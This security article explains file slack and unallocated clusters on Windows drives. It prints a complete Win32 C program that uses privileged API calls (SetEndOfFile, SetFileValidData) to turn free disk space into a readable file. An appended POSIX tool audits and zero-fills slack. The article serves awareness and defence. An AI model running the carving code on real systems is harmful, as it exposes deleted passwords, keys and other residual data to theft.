Beware of File-Slack Attacks



Hard drives are dangerous things. The data they store never really goes away with absolute certainty, and the risk of data theft from nearly any area of a drive at any time is very real. When a file is deleted, the sectors formerly occupied by the file's allocated clusters, also known as allocation units, are marked as free, or unallocated. A cluster of sectors is the smallest unit of file allocation performed through normal OS file operations.

As a file grows in size, new clusters are allocated until the final cluster of the file is partially filled with data, leaving unused sectors and partially used sectors within the final cluster. These unused areas are known as "file slack," and the slack space contains whatever data happens to have been on the drive previously. This can include sensitive data such as passwords or encryption keys, whether written to the drive explicitly by software or swapped out to the drive as part of a swap file.

Flaws in software that copies files have been known to read beyond the logical end of a file, up to the physical boundary of the final cluster, and so transfer file slack from one place to another, when software that manipulates logical files should ignore slack entirely. Whenever slack is copied along with a file, an unknown quantity of potentially sensitive data is put at risk of theft. For this reason, tools exist that wipe file slack automatically as files are created or copied.

Data recovery of deleted or lost files from unallocated clusters requires little more than the execution of privileged code. A small number of Win32 API calls can be used in concert to create a new file and extend its physical size without writing any data, causing a file of the selected size to exist entirely as file slack. The slack can then be converted to content within the logical file, resulting in easy Win32 API-based access to unallocated drive space without requiring low-level calls by way of a device driver interface to accomplish similar free space data extraction. An example of carving such ambient data out of free space on a drive is shown in the following code.

// SetEndOfFileTheft.cpp

#define STEALCLUSTERS 10

#include <windows.h>
#include <stdio.h>

int main(int argc, char * argv[]) {
  DWORD dwSectorsPerCluster = 0, dwBytesPerSector = 0,
    dwNumberOfFreeClusters = 0, dwTotalNumberOfClusters = 0;

  // A NULL root path means the volume holding the current directory.
  if(!GetDiskFreeSpaceA(NULL, &dwSectorsPerCluster, &dwBytesPerSector,
       &dwNumberOfFreeClusters, &dwTotalNumberOfClusters)) {
    printf("GetDiskFreeSpace err: %u\n", GetLastError());
    return 1; }
  DWORD dwBytesPerCluster = dwBytesPerSector * dwSectorsPerCluster;

  HANDLE hToken = NULL, h = INVALID_HANDLE_VALUE;
  TOKEN_PRIVILEGES tp;
  LUID luid;

  // Only the access rights AdjustTokenPrivileges needs, not TOKEN_ALL_ACCESS.
  if(!OpenProcessToken(GetCurrentProcess(),
       TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
    printf("OpenProcessToken err: %u\n", GetLastError());
    return 1; }

  if(!LookupPrivilegeValueA(NULL, SE_MANAGE_VOLUME_NAME, &luid)) {
    printf("LookupPriv err: %u\n", GetLastError()); }
  else {
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Luid = luid;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    // AdjustTokenPrivileges returns TRUE even when the token does not hold the
    // privilege at all; ERROR_NOT_ALL_ASSIGNED from GetLastError reveals that case.
    if(!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES),
         (PTOKEN_PRIVILEGES) NULL, (PDWORD) NULL)
       || GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
      printf("AdjustToken err: %u\n", GetLastError()); }
    else {
      h = CreateFileA("datatheft.dat", GENERIC_WRITE, FILE_SHARE_WRITE, 0,
            CREATE_ALWAYS, 0, 0);
      // CreateFile signals failure with INVALID_HANDLE_VALUE, not NULL.
      if(h == INVALID_HANDLE_VALUE) {
        printf("CreateFile err: %u\n", GetLastError()); }
      else if(SetFilePointer(h, dwBytesPerCluster * STEALCLUSTERS, 0, FILE_BEGIN)
                == INVALID_SET_FILE_POINTER) {
        printf("SetFilePointer failed: %u\n", GetLastError()); }
      // Grow the physical size to STEALCLUSTERS clusters without writing any data.
      else if(!SetEndOfFile(h)) {
        printf("SetEndOfFile failed: %u\n", GetLastError()); }
      // Steal data from slack by raising the valid data length (the logical end
      // of the readable file) to the length of the file slack
      // (bytes per cluster * STEALCLUSTERS) minus 1, to avoid exceeding the
      // physical end of file.
      else if(!SetFileValidData(h, dwBytesPerCluster * STEALCLUSTERS - 1)) {
        printf("Error calling SetFileValidData: %u\n", GetLastError()); }
      else {
        printf("File slack space sector data theft successful.\n"); }
    }
  }
  if(h != INVALID_HANDLE_VALUE) CloseHandle(h);
  CloseHandle(hToken);
  return 0;
}

A call to GetDiskFreeSpace provides the basic drive geometry: the size of each sector in bytes and the size of each cluster in sectors. Because every file begins on a cluster boundary and its allocation ends on one as well, a program that creates a new empty file and expands it by multiples of the cluster size is assured of claiming whole clusters, and everything they contain, with nothing left over. The key to converting file slack into part of a logical file is the SetFileValidData function, which requires the current process token to hold the SeManageVolumePrivilege privilege (identified in code by the SE_MANAGE_VOLUME_NAME constant).

A call to LookupPrivilegeValue followed by AdjustTokenPrivileges ensures that a security context which has already been granted the necessary privilege actually has it enabled before the file's logical parameters are altered. Creating a file with CreateFile and then positioning the file pointer with SetFilePointer at a multiple of the drive's cluster size prepares the file to grow physically without any data being written to the drive. The growth from FILE_BEGIN to the computed new ending cluster takes effect when SetFilePointer is followed by SetEndOfFile, which actually changes the file's physical size.

To complete the conversion of data from the file's new slack to the file's logical body, a call to SetFileValidData is made. Once the slack becomes logical file space, "theft" of the data becomes as easy as using any logical file copy program. The data may or may not be of any value, and a hex editor will likely be necessary to view the full content of the logical file in order to extract just data of interest. Though this approach to carving data out of unallocated clusters is crude compared to any actual data recovery tool, the ease with which nearly any data physically present in free space on a drive can be accessed using only Win32 API calls helps to further build awareness of the need for better data protection. Wiping a drive's free space so that file slack is always meaningless data in the creation of any logical file is the only way to ensure that such data carve techniques are unsuccessful in accomplishing real-world data theft.
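The article names slack-wiping tools (in the discussion of file-copy flaws) and free-space wiping as the defence. The following C program is an added example, not the article's code: it computes a file's slack from volume geometry the way the article describes (logical size rounded up to a multiple of the cluster size), compares it with the slack the operating system itself reports, and zero-fills the tail of the last cluster the way a slack wiper does, by extending the file with explicit zeros to the cluster boundary, flushing, and truncating back. It is written against POSIX rather than Win32 so it builds and runs anywhere; the 4096-byte default cluster size, the temp-file path, and the function names slack_bytes, clusters_used, file_slack, wipe_slack and wipe_selftest are assumptions of this example. Whether the zeros physically reach the tail sectors depends on the file system and its caching, so the program is a demonstration of the technique, not a certified wiper.

```c
/* slack_audit.c: added example (not from the article). Computes a file's
 * slack from volume geometry and from the OS's own allocation figures, and
 * zero-fills the tail of the last cluster the way slack-wiping tools do.
 * POSIX only. The on-disk effect of the wipe depends on the file system;
 * the 4096-byte cluster size used by main() is an assumed default. */
#ifndef _XOPEN_SOURCE
#define _XOPEN_SOURCE 700
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Slack left in the last cluster of a file of logical_size bytes on a
 * volume whose allocation unit is cluster_bytes. A file that ends exactly
 * on a cluster boundary, or an empty file, has no slack. */
static long long slack_bytes(long long logical_size, long long cluster_bytes)
{
    if (cluster_bytes <= 0 || logical_size <= 0)
        return 0;
    long long rem = logical_size % cluster_bytes;
    return rem == 0 ? 0 : cluster_bytes - rem;
}

/* Clusters a file of logical_size bytes occupies (rounded up). */
static long long clusters_used(long long logical_size, long long cluster_bytes)
{
    if (cluster_bytes <= 0 || logical_size <= 0)
        return 0;
    return (logical_size + cluster_bytes - 1) / cluster_bytes;
}

/* Slack as the OS reports it: allocated bytes (st_blocks counts 512-byte
 * units) minus logical bytes, clamped at 0 for sparse or compressed files.
 * Returns -1 if the file cannot be stat'ed. */
static long long file_slack(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    long long slack = (long long)st.st_blocks * 512 - (long long)st.st_size;
    return slack < 0 ? 0 : slack;
}

/* Overwrite one file's slack with zeros: extend it with explicit zero bytes
 * up to the next cluster boundary, flush, then truncate back to the original
 * logical size. Returns the number of zero bytes written, or -1 on error;
 * the logical content of the file is left unchanged. */
static long long wipe_slack(const char *path, long long cluster_bytes)
{
    static const char zeros[4096];          /* zero-initialised by C */
    int fd = open(path, O_RDWR);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) != 0) { close(fd); return -1; }
    long long logical = (long long)st.st_size;
    long long slack = slack_bytes(logical, cluster_bytes), left = slack;
    if (slack > 0 && lseek(fd, (off_t)logical, SEEK_SET) < 0) { close(fd); return -1; }
    while (left > 0) {
        size_t chunk = left < (long long)sizeof zeros ? (size_t)left : sizeof zeros;
        ssize_t n = write(fd, zeros, chunk);
        if (n <= 0) { close(fd); return -1; }
        left -= n;
    }
    /* Flush the zeros, then cut the file back so its logical size is unchanged. */
    if (slack > 0 && (fsync(fd) != 0 || ftruncate(fd, (off_t)logical) != 0)) {
        close(fd);
        return -1;
    }
    close(fd);
    return slack;
}

/* Self-check on a constructed 1000-byte temp file: the wipe must report 3096
 * bytes of slack for 4096-byte clusters and leave the content intact.
 * Returns 1 on success, 0 on any failure. */
static int wipe_selftest(void)
{
    char path[] = "/tmp/slack_demo_XXXXXX";   /* assumed writable location */
    int fd = mkstemp(path);
    if (fd < 0)
        return 0;
    char data[1000], back[1000];
    memset(data, 'A', sizeof data);
    int ok = write(fd, data, sizeof data) == (ssize_t)sizeof data;
    close(fd);
    ok = ok && wipe_slack(path, 4096) == 3096 && file_slack(path) >= 0;
    struct stat st;
    ok = ok && stat(path, &st) == 0 && st.st_size == 1000;
    fd = ok ? open(path, O_RDONLY) : -1;
    ok = ok && fd >= 0 && read(fd, back, sizeof back) == (ssize_t)sizeof back
         && memcmp(back, data, sizeof back) == 0;
    if (fd >= 0) close(fd);
    unlink(path);
    return ok;
}

int main(int argc, char **argv)
{
    long long cluster = argc > 2 ? atoll(argv[2]) : 4096;   /* assumed default */
    if (argc < 2) {
        printf("self-test %s\n", wipe_selftest() ? "passed" : "FAILED");
        return 0;
    }
    struct stat st;
    if (stat(argv[1], &st) != 0) { perror("stat"); return 1; }
    printf("%s: %lld bytes in %lld clusters of %lld; geometric slack %lld, "
           "OS-reported slack %lld\n", argv[1], (long long)st.st_size,
           clusters_used(st.st_size, cluster), cluster,
           slack_bytes(st.st_size, cluster), file_slack(argv[1]));
    long long n = wipe_slack(argv[1], cluster);
    if (n < 0) { perror("wipe_slack"); return 1; }
    printf("zeroed %lld slack bytes\n", n);
    return 0;
}
```

Run it with no arguments for the built-in self-test, or with a file path and an optional cluster size in bytes to audit and then wipe that file's slack. The geometric figure and the OS-reported figure normally agree for an ordinary file; a large gap between them is worth a look, since it means the allocation does not match what the logical size predicts.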


Jason Coombs is Director of Forensic Services for PivX Solutions Inc. (NASDAQ OTCBB: PIVX), a provider of security solutions, computer forensics, and expert witness services. Reach him at [email protected].


